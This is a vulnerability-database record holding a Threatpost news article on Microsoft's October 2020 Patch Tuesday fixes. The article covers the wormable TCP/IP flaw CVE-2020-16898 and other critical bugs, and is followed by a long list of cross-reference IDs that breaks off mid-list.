DATABASE RESOURCES PRICING ABOUT US

{"id": "THREATPOST:779B904F971138531725D1E57FDFF9DD", "type": "threatpost", "bulletinFamily": "info", "title": "October Patch Tuesday: Microsoft Patches Critical, Wormable RCE Bug", "description": "Microsoft has pushed out fixes for 87 security vulnerabilities in October \u2013 11 of them critical \u2013 and one of those is potentially wormable.\n\nThere are also six bugs that were previously unpatched but publicly disclosed, which could give cybercriminals a leg up \u2014 and in fact at least one public exploit is already circulating for this group.\n\nThis month\u2019s Patch Tuesday overall includes fixes for bugs in Microsoft Windows, Office and Office Services and Web Apps, Azure Functions, Open Source Software, Exchange Server, Visual Studio, .NET Framework, Microsoft Dynamics, and the Windows Codecs Library.\n\nA full 75 are listed as important, and just one is listed as moderate in severity. None are listed as being under active attack, but the group does include six issues that were known but unpatched before this month\u2019s regularly scheduled updates.\n\n\u201cAs usual, whenever possible, it\u2019s better to prioritize updates against the Windows operating system,\u201d Richard Tsang, senior software engineer at Rapid7, told Threatpost. \u201cComing in at 53 of the 87 vulnerabilities, patching the OS knocks out 60 percent of the vulnerabilities listed, along with over half of the critical RCE vulnerabilities resolved today.\u201d\n\n## **11 Critical Bugs**\n\nOne of the most notable critical bugs, according to researchers, is a remote code-execution (RCE) problem in the TCP/IP stack. That issue ([CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)) allows attackers to execute arbitrary code with elevated privileges using a specially crafted ICMPv6 router advertisement.\n\nMicrosoft gives this bug its highest exploitability rating, meaning attacks in the wild are extremely likely \u2013 and as such, it carries a severity rating of 9.8 out of 10 on the CvSS vulnerability scale. True to the season, it could be an administrator\u2019s horror show.\n\n\u201cIf you\u2019re running an IPv6 network, you know that filtering router advertisements is not a practical workaround,\u201d said Dustin Childs, researcher at Trend Micro\u2019s Zero-Day Initiative (ZDI), in his [Patch Tuesday analysis](<https://www.thezdi.com/blog/2020/10/13/the-october-2020-security-update-review>). \u201cYou should definitely test and deploy this patch as soon as possible.\u201d\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\nBharat Jogi, senior manager of vulnerability and threat research at Qualys, said that an exploit for the bug could be self-propagating, worming through infrastructure without user interaction.\n\n\u201cAn attacker can exploit this vulnerability without any authentication, and it is potentially wormable,\u201d he said. \u201cWe expect a proof-of-concept (PoC) for this exploit would be dropped soon, and we highly encourage everyone to fix this vulnerability as soon as possible.\u201d\n\nThreatpost has reached out for more technical details on the wormable aspect of the bug.\n\n\u201cLuckily, if immediate patching isn\u2019t viable due to reboot scheduling, Microsoft provides [PowerShell-based commands](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16898#ID0EUGAC>) to disable ICMPv6 RDNSS on affected operating systems,\u201d said Tsang. \u201cThe PowerShell command `netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable` does not require a reboot to take effect.\u201d\n\nAnother of the critical flaws is an RCE bug in Microsoft Outlook ([CVE-2020-16947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>)). The bug can be triggered by sending a specially crafted email to a target; and because the Preview Pane is an attack vector, victims don\u2019t need to open the mail to be infected (ZDI already has a proof-of-concept for this). It can also be used in a web-based attack by convincing users to visit a malicious URL hosting triggering content.\n\n\u201cThe specific flaw exists within the parsing of HTML content in an email. The issue results from the lack of proper validation of the length of user-supplied data before copying it to a fixed-length heap-based buffer,\u201d according to Childs. That bug is rated 8.1 on the CvSS scale.\n\nA critical Windows Hyper-V RCE bug ([CVE-2020-16891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16891>), 8.8 on the CvSS scale) meanwhile allows an attacker to run a specially crafted program on an affected guest OS to execute arbitrary code on the host OS.\n\nAnd, other critical problems impact the Windows Camera Codec ([CVE-2020-16967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16967>) and [CVE-2020-16968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16968>), both 7.8 on the CvSS scale), both resulting from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer.\n\n\u201cIf the current user is logged on with administrative user rights, an attacker could take control of the affected system,\u201d according to Microsoft. \u201cAn attacker could then install programs; view, change or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\u201d\n\nTwo other critical flaws are RCE problems in SharePoint Server ([CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>) and [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>), both 8.6 on the CvSS scale). They exploit a gap in checking the source markup of an application package. Upon successful exploitation, the attacker could run arbitrary code in the context of the SharePoint application pool or server farm account.\n\n\u201cIn both cases, the attacker would need to upload a specially crafted SharePoint application package to an affected version of SharePoint to get arbitrary code execution,\u201d explained Childs. \u201cThis can be accomplished by an unprivileged SharePoint user if the server\u2019s configuration allows it.\u201d\n\nTsang added that PoCs are \u201cstarting to flow out in the wild, so bringing a closure to this pair of critical remote code execution vulnerabilities is a must.\u201d\n\nThe remaining critical bugs are RCE issues in Media Foundation Library ([CVE-2020-16915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16915>), rating 7.8); the Base3D rendering engine ([CVE-2020-17003](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17003>), rating 7.8); Graphics components ([CVE-2020-16923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16923>), rating 7.8); and the Windows Graphics Device Interface (GDI) ([CVE-2020-16911](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16911>), rating 8.8).\n\nRegarding the latter, the vulnerability exists in the way GDI handles objects in memory, according to Allan Liska, senior security architect at Recorded Future.\n\n\u201cSuccessful exploitation could allow an attacker to gain control of the infected system with the same administrative privileges as the victim,\u201d he said, via email. \u201cThis vulnerability could be exploited by either tricking a victim into visiting a compromised website with a specially crafted document or opening a specially crafted document via a phishing attack.\u201d\n\nTsang added, \u201cA mitigating factor here is that users with fewer privileges on the system could be less impacted, but still emphasizes the importance of good security hygiene as exploitation requires convincing a user to open a specially-crafted file or to view attacker-controlled content. Unlike CVE-2020-16898, however, this vulnerability affects all supported versions of Windows OS, which may suggest affecting unsupported/earlier versions of Windows as well.\u201d\n\n## **6 Publicly Known Bugs**\n\nThere are also a half-dozen vulnerabilities that have been unpatched until this month, but which were publicly known.\n\n\u201cPublic disclosure could mean a couple things,\u201d Todd Schell, senior product manager of security at Ivanti told Threatpost. \u201cIt could be that a demonstration of exploit was performed at an event or by a researcher. It could also mean that a PoC code has been made available.\u201d\n\nWhen it comes to these publicly known bugs, a Windows Error Reporting (WER) elevation-of-privilege issue (CVE-2020-16909) stands out, according to Childs, given that bugs in the WER component [were recently reported as being used in the wild](<https://threatpost.com/apt-attack-malware-windows-error-reporting/159861/>) in fileless attacks.\n\n\n\nThe six publicly disclosed bugs. Source: Trend Micro\u2019s ZDI.\n\nAs for the others, two of are EoP bugs, in the Windows Setup component and the Windows Storage VSP Driver; two are information-disclosure problems in the kernel; and one is an information-disclosure issue in .NET Framework.\n\n\u201cThese info-disclosure bugs leak the contents of kernel memory but do not expose any personally identifiable information,\u201d Childs said.\n\nOne of the info-disclosure bugs, [CVE-2020-16938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16938>), now has a PoC exploit that was [dropped on Twitter](<https://twitter.com/jonasLyk/status/1316104870987010048>) on Tuesday, by @jonasLyk. He claimed that a \u201crecent update changed the permissions on partitions and volume device objects, granting everybody read access. This means that by opening the device directly you can read the raw data without any [privileges].\u201d\n\nWith exploits emerging already, Schell pointed out that \u201ca public disclosure does mean that threat actors have advanced warning of a vulnerability and this gives them an advantage.\u201d In fact, the [mean time to exploit a vulnerability from the moment of its disclosure is 22 days](<https://www.rand.org/content/dam/rand/pubs/research_reports/RR1700/RR1751/RAND_RR1751.pdf>), according to a research study from the RAND Institute.\n\nOverall, the lighter patch load of 87 fixes is a significant departure from the 110+ patches the software giant has released every month since March.\n\n\u201cSecurity teams are still reeling from efforts around reducing exposure to CVE-2020-1472 (Zerologon), and today\u2019s Patch Tuesday thankfully brings a slightly lightened load of vulnerabilities compared to the previous seven months, with no vulnerabilities currently known to be exploited in the wild,\u201d Jonathan Cran, head of research at Kenna Security, told Threatpost. \u201cThat said, several of the vulnerabilities in today\u2019s update should be treated with a priority due to their usefulness to attackers [the critical bugs in the Win10 IPv6 stack, Outlook and Hyper-V]. These vulnerabilities all fall into the \u2018patch quickly or monitor closely\u2019 bucket.\n\nAlso, some products were notably absent from the fixes list.\n\n\u201cThere are a couple of interesting things this month,\u201d Schell told Threatpost. \u201cThere are no browser vulnerabilities being resolved. At the time of release, Microsoft did not have any CVEs reported against IE or Edge and no listing of the browsers as affected products this month. Not sure I remember the last time that has happened.\u201d\n\nPatch Tuesday rolls out this month as Microsoft launches the preview of [its new update guide](<https://threatpost.com/microsoft-overhauls-security-update-guide/159449/>).\n\n\u201cIt has provided a few nice improvements,\u201d Schell said. \u201cQuick access to more of the risk-focused information can be found in [the vulnerabilities view](<https://msrc.microsoft.com/update-guide/vulnerability>). Columns like \u2018Exploited\u2019 and \u2018Publicly Disclosed\u2019 allow you to sort and view quickly if there are high-risk items.\u201d\n\n[**On October 14 at 2 PM ET**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[**Register today**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[**Retail Security: Magecart and the Rise of e-Commerce Threats.**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[**LIVE **](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.**\n", "published": "2020-10-13T20:44:01", "modified": "2020-10-13T20:44:01", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/october-patch-tuesday-wormable-bug/160044/", "reporter": "Tara Seals", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898", "https://www.thezdi.com/blog/2020/10/13/the-october-2020-security-update-review", "https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar", "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16898#ID0EUGAC", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16891", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16967", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16968", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16915", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17003", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16923", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16911", "https://threatpost.com/apt-attack-malware-windows-error-reporting/159861/", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16938", "https://twitter.com/jonasLyk/status/1316104870987010048", "https://www.rand.org/content/dam/rand/pubs/research_reports/RR1700/RR1751/RAND_RR1751.pdf", "https://threatpost.com/microsoft-overhauls-security-update-guide/159449/", "https://msrc.microsoft.com/update-guide/vulnerability", "https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar", "https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar", "https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar", "https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar"], "cvelist": ["CVE-2020-1472", "CVE-2020-16891", "CVE-2020-16898", "CVE-2020-16909", "CVE-2020-16911", "CVE-2020-16915", "CVE-2020-16923", "CVE-2020-16938", "CVE-2020-16947", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16967", "CVE-2020-16968", "CVE-2020-17003", "CVE-2020-5135"], "lastseen": "2020-10-14T20:43:08", "viewCount": 311, "enchantments": {"dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS2-2021-1585", "ALAS2-2021-1649"]}, {"type": "archlinux", "idList": ["ASA-202009-17"]}, {"type": "attackerkb", "idList": ["AKB:1C1E9FA5-A4DB-4CE8-8770-2431CE166358", "AKB:71F77351-1AE5-4161-8836-D26680828466", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:9B59AD71-CB71-4C61-A639-5DC0E582DDC2", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9", "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:490028"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0872", "CPAI-2020-0901", "CPAI-2020-1004", "CPAI-2020-1043", "CPAI-2020-1095", "CPAI-2020-1367"]}, {"type": "cisa", "idList": ["CISA:2B970469D89016F563E142BE209443D8", "CISA:348CDAC76EADE8EE621368419146CDE1", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:48962A3B37B032DCF622B3E3135B8A1A", "CISA:60BECD302CACD014F496544254DCB720", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:E5A33B5356175BB63C2EFA605346F8C7"]}, {"type": "cve", "idList": ["CVE-2020-1167", "CVE-2020-1472", "CVE-2020-16891", "CVE-2020-16898", "CVE-2020-16901", "CVE-2020-16905", "CVE-2020-16909", "CVE-2020-16911", "CVE-2020-16915", "CVE-2020-16918", "CVE-2020-16923", "CVE-2020-16938", "CVE-2020-16947", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16967", "CVE-2020-16968", "CVE-2020-17003", "CVE-2020-5135"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2463-1:1381E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472"]}, {"type": "exploitdb", "idList": ["EDB-ID:49071"]}, {"type": "f5", "idList": ["F5:K93951507"]}, {"type": "fedora", "idList": ["FEDORA:38D8230C58CD", "FEDORA:4A64830CFCDC", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:D64714BFF80E34308579150D4C839557"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1"]}, {"type": "gentoo", "idList": ["GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["02065E08-7493-5F8F-BA4C-860931D3D2D3", "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "08C67247-7D33-5943-A7AF-2E9C8989658E", "0CFAB531-412C-57A0-BD9E-EF072620C078", "12E44744-1AF0-523A-ACA2-593B4D33E014", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "20466D13-6C5B-5326-9C8B-160E9BE37195", "2255B39F-1B91-56F4-A323-8704808620D3", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "3F400483-1F7E-5BE5-8612-4D55D450D553", "49EC151F-12F0-59CF-960C-25BD54F46680", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "59F9AB6D-E4E2-5EEF-9F2E-2337B7C8D4B9", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "60DC34D5-16D7-5E65-8C51-B36123C2EF39", "63C36F7A-5F99-5A79-B99F-260360AC237F", "699EB52B-3630-500F-BA12-8F3B95E22A12", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "803A4C79-0547-5178-A113-233AC5D2498C", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "8B5E018D-C89A-519A-8923-D1E3290A79C8", "92ED250D-4B79-5B70-A5ED-2A55493C90CA", "939F3BE7-AF69-5351-BD56-12412FA184C5", "9C9BD402-511C-597D-9864-647131FE6647", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "AB5BA257-13FA-5667-BDBE-A3E1C4658F49", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "B5E5F84A-7647-5D17-9E1D-643518A6A3A9", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "C96C8DD1-344C-5476-85AC-6D2865A5C00F", "CD749811-2E16-5303-AD4B-1A0DDBCD78A4", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "D7EB3EE2-A5C4-5CC7-B84F-D32CEB99D65A", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F472C105-E3B1-524A-BBF5-1C436185F6EE", "F9B55BEE-32D1-5654-A978-E27E752E7163", "FC661572-B96B-5B2C-B12F-E8D279E189BF"]}, {"type": "hivepro", "idList": ["HIVEPRO:8DA601C83DB9C139357327C06B06CB36"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1"]}, {"type": "kaspersky", "idList": ["KLA11929", "KLA11931", "KLA11974", "KLA11976", "KLA11977", "KLA11978"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:7252221B56E65C46DEF83A6DDC0B70FB", "KREBS:952ACEBFD55EBD076910C6B233491883", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62"]}, {"type": "mageia", "idList": ["MGASA-2020-0380"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "MSF:EXPLOIT-WINDOWS-HTTP-SHAREPOINT_SSI_VIEWSTATE-"]}, {"type": "mmpc", "idList": ["MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:CVE-2020-1472", "MS:CVE-2020-16891", "MS:CVE-2020-16898", "MS:CVE-2020-16909", "MS:CVE-2020-16911", "MS:CVE-2020-16915", "MS:CVE-2020-16923", "MS:CVE-2020-16938", "MS:CVE-2020-16947", "MS:CVE-2020-16951", "MS:CVE-2020-16952", "MS:CVE-2020-16967", "MS:CVE-2020-16968", "MS:CVE-2020-17003"]}, {"type": "mskb", "idList": ["KB4486671", "KB4486676", "KB4486677", "KB4486694", "KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384"]}, {"type": "msrc", "idList": ["MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09"]}, {"type": "mssecure", "idList": ["MSSECURE:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "DEBIAN_DLA-2463.NASL", "EULEROS_SA-2020-2171.NASL", "EULEROS_SA-2020-2181.NASL", "EULEROS_SA-2020-2299.NASL", "EULEROS_SA-2020-2396.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1635.NASL", "EULEROS_SA-2021-2168.NASL", "FEDORA_2020-0BE2776ED3.NASL", "FEDORA_2020-77C15664B0.NASL", "FEDORA_2020-A1D139381A.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "GENTOO_GLSA-202012-24.NASL", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2021-0167_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2022-0058_SAMBA.NASL", "OPENSUSE-2020-1513.NASL", "OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-1647.NASL", "REDHAT-RHSA-2021-3723.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS20_OCT_3D_VIEWER.NASL", "SMB_NT_MS20_OCT_4577668.NASL", "SMB_NT_MS20_OCT_4577671.NASL", "SMB_NT_MS20_OCT_4579311.NASL", "SMB_NT_MS20_OCT_4580327.NASL", "SMB_NT_MS20_OCT_4580328.NASL", "SMB_NT_MS20_OCT_4580330.NASL", "SMB_NT_MS20_OCT_4580345.NASL", "SMB_NT_MS20_OCT_4580346.NASL", "SMB_NT_MS20_OCT_4580347.NASL", "SMB_NT_MS20_OCT_4580378.NASL", "SMB_NT_MS20_OCT_4580382.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL", "SMB_NT_MS20_OCT_OUTLOOK.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SONICWALL_SNWLID-2020-0010.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL", "UBUNTU_USN-4559-1.NASL", "WEB_APPLICATION_SCANNING_112737", "WEB_APPLICATION_SCANNING_112738", "WEB_APPLICATION_SCANNING_112739", "WEB_APPLICATION_SCANNING_112740"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439", "ELSA-2021-1647"]}, {"type": "osv", "idList": ["OSV:DLA-2463-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159612", "PACKETSTORM:160127"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "ptsecurity", "idList": ["PT-2020-29"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:7799BDEDC6C56E9CAE494D08410C252D", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:0E497787F9B42FC1D11439220E6A9D3F", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492", "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "redhat", "idList": ["RHSA-2020:5439", "RHSA-2021:1647", "RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": ["SECURELIST:100DB957ACFED2B9DC6D860183E5B88F", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08"]}, {"type": "srcincite", "idList": ["SRC-2020-0022", "SRC-2020-0024"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1", "OPENSUSE-SU-2020:1526-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:A30AE10A13D33189456EB192DDF2B8C2", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C3154ED3ABE28924B7CC42873DED19BB", "THN:D6FED8C7635FDB50C271368C9373B439", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1"]}, {"type": "threatpost", "idList": ["THREATPOST:033645C929899D29D91092278D188D8E", "THREATPOST:0A238D67F7286BA41103801846210F7A", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:0EAD358006302B8EB3637C22334E13DC", "THREATPOST:0ED2C20BB1821A77810AB2D29BB6A6A5", "THREATPOST:130EDA07603C228BE562B445904A297A", "THREATPOST:1322630273A25CA5A68246679553E2B8", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:158524EA6F79769C547CC6A407EF6E78", "THREATPOST:1973BA4B294E79D107940CF5DA67CB9A", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", 